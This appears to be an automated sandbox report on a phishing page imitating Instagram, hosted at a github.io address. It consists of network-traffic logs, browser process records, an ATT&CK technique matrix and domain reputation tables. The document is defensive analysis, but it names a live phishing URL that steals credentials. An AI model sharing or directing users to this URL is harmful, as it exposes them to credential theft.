    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
    Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49757 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@22/606@48/16
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5608 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5608 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://sayidanur.github.io/instagram.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://support.google.com0%URL Reputationsafe
    https://fontawesome.com0%URL Reputationsafe
    https://www.internalfb.com/intern/invariant/0%URL Reputationsafe
    https://apis.google.com/js/api.js0%URL Reputationsafe
    https://schema.org0%URL Reputationsafe
    https://connect.facebook.net/0%URL Reputationsafe
    https://fontawesome.com/license/free0%URL Reputationsafe
    http://schema.org0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    star-mini.c10r.facebook.com
    157.240.253.35
    truefalse
      unknown
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalse
        unknown
        sayidanur.github.io
        185.199.110.153
        truefalse
          unknown
          scontent.xx.fbcdn.net
          157.240.251.9
          truefalse
            unknown
            play.google.com
            142.250.184.206
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                play-lh.googleusercontent.com
                142.250.185.214
                truefalse
                  unknown
                  facebook.com
                  157.240.0.35
                  truefalse
                    unknown
                    www.google.com
                    142.250.184.228
                    truefalse
                      unknown
                      fp2e7a.wpc.phicdn.net
                      192.229.221.95
                      truefalse
                        unknown
                        www.facebook.com
                        unknown
                        unknownfalse
                          unknown
                          is2-ssl.mzstatic.com
                          unknown
                          unknownfalse
                            unknown
                            is4-ssl.mzstatic.com
                            unknown
                            unknownfalse
                              unknown
                              connect.facebook.net
                              unknown
                              unknownfalse
                                unknown
                                static.xx.fbcdn.net
                                unknown
                                unknownfalse
                                  unknown
                                  is3-ssl.mzstatic.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    is1-ssl.mzstatic.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      is5-ssl.mzstatic.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        https://www.facebook.com/pages/create/?ref_type=registration_formfalse
                                          unknown
                                          https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/5VtnQAqNe99.jsfalse
                                            unknown
                                            https://static.xx.fbcdn.net/rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.jsfalse
                                              unknown
                                              https://www.facebook.com/?locale=ru_RUfalse
                                                unknown
                                                https://facebook.com/security/hsts-pixel.giffalse
                                                  unknown
